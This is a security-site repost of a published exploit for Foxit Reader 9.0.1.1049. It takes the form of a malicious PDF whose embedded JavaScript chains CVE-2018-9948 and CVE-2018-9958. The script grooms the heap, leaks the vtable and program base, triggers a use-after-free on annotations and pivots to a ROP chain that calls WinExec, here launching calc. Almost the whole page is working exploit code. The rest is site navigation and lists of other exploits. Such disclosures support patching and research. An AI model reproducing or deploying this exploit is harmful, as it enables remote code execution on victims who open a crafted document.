首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Foxit Reader 9.0.1.1049 - Remote Code Execution
来源:https://srcincite.io/blog 作者:mr_me 发布时间:2018-06-28  
%PDF
1 0 obj
<</Pages 1 0 R /OpenAction 2 0 R>>
2 0 obj
<</S /JavaScript /JS (
 
/*
Foxit Reader Remote Code Execution Exploit
==========================================
 
Written by: Steven Seeley (mr_me) of Source Incite
Date: 22/06/2018
Technical details: https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html
Download: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English
Target version: Foxit Reader v9.0.1.1049 (sha1: e3bf26617594014f4af2ef2b72b4a86060ec229f)
Tested on:
    1. Windows 7 Ultimate x86 build 6.1.7601 sp1
    2. Windows 10 Pro x86 v1803 build 10.0.17134
Vulnerabilities leveraged:
    1. CVE-2018-9948
    2. CVE-2018-9958
*/
 
var heap_ptr   = 0;
var foxit_base = 0;
var pwn_array  = [];
 
function prepare_heap(size){
    /*
        This function prepares the heap state between allocations
        and frees to get a predictable memory address back.
    */
    var arr = new Array(size);
    for(var i = 0; i < size; i++){
        arr[i] = this.addAnnot({type: "Text"});;
        if (typeof arr[i] == "object"){
            arr[i].destroy();
        }
    }
}
    
function gc() {
    /*
        This is a simple garbage collector, written by the notorious @saelo
        Greetz, mi amigo.
    */
    const maxMallocBytes = 128 * 0x100000;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}
 
function alloc_at_leak(){
    /*
        This is the function that allocates at the leaked address
    */
    for (var i = 0; i < 0x64; i++){
        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
    }
}
 
function control_memory(){
    /*
        This is the function that fills the memory address that we leaked
    */
    for (var i = 0; i < 0x64; i++){
        for (var j = 0; j < pwn_array[i].length; j++){
            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
        }
    }
}
 
function leak_vtable(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found by: bit from meepwn team
    */
 
    // alloc
    var a = this.addAnnot({type: "Text"});
 
    // free
    a.destroy();
    gc();
    
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);
 
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
 
    // leak the vtable
    var leaked = stolen[0] & 0xffff0000;
 
    // a hard coded offset to FoxitReader.exe base v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    foxit_base = leaked - 0x01f50000;
}
 
function leak_heap_chunk(){
    /*
        Foxit Reader Typed Array Uninitialized Pointer Information Disclosure Vulnerability
        ZDI-CAN-5380 / ZDI-18-332 / CVE-2018-9948
        Found by: bit from meepwn team
    */
 
    // alloc
    var a = this.addAnnot({type: "Text"});
    
    // free
    a.destroy();
    
    // kinda defeat lfh randomization in win 10
    prepare_heap(0x400);
        
    // reclaim
    var test = new ArrayBuffer(0x60);
    var stolen = new Int32Array(test);
    
    // alloc at the freed location
    alloc_at_leak();
    
    // leak a heap chunk of size 0x40
    heap_ptr = stolen[1];
}
 
function reclaim(){
    /*
        This function reclaims the freed chunk, so we can get rce and I do it a few times for reliability.
        All gadgets are from FoxitReader.exe v9.0.1.1049 (a01a5bde0699abda8294d73544a1ec6b4115fa68)
    */
 
    var arr = new Array(0x10);
    for (var i = 0; i < arr.length; i++) {
        arr[i] = new ArrayBuffer(0x60);
        var rop = new Int32Array(arr[i]);
 
        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
        rop[0x02] = 0x72727272;              // junk
        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
        rop[0x04] = 0xffffffff;              // ret of WinExec
        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
        rop[0x0c] = 0x636c6163;              // calc
        rop[0x0d] = 0x00000000;              // adios, amigo
 
        for (var j = 0x0e; j < rop.length; j++) {
            rop[j] = 0x71727374;
        }
    }
}
 
function trigger_uaf(){
    /*
        Foxit Reader Text Annotations point Use-After-Free Remote Code Execution Vulnerability
        ZDI-CAN-5620 / ZDI-18-342 / CVE-2018-9958
        Found by: Steven Seeley (mr_me) of Source Incite
    */
 
    var that = this;
    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
    var arr = [1];
    Object.defineProperties(arr,{
        "0":{
            get: function () {
 
                // free
                that.getAnnot(0, "uaf").destroy();
 
                // reclaim freed memory
                reclaim();
                return 1;
            }
        }
    });
 
    // re-use
    a.point = arr;
}
 
function main(){
 
    // 1. Leak a heap chunk of size 0x40
    leak_heap_chunk();
 
    // 2. Leak vtable and calculate the base of Foxit Reader
    leak_vtable();
 
    // 3. Then fill the memory region from step 1 with a stack pivot
    control_memory();
 
    // 4. Trigger the uaf, reclaim the memory, pivot to rop and win
    trigger_uaf();
}
 
if (app.platform == "WIN"){
    if (app.isFoxit == "Foxit Reader"){
        if (app.appFoxitVersion == "9.0.1.1049"){
            main();
        }
    }
}
 
)>> trailer <</Root 1 0 R>>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Opencart < 3.0.2.0 - Denial of
·KVM (Nested Virtualization) -
·IPConfigure Orchid VMS 2.0.5 -
·Quest KACE Systems Management
·Audiograbber 1.83 - Local Buff
·Microsoft Internet Explorer HT
·Pale Moon Browser < 27.9.3 - U
·Polaris Office 2017 8.1 Remote
·Nikto 2.1.6 - CSV Injection
·Cisco Adaptive Security Applia
·Soroush IM Desktop App 0.15 (b
·Geutebruck 5.02024 G-Cam/EFD-2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved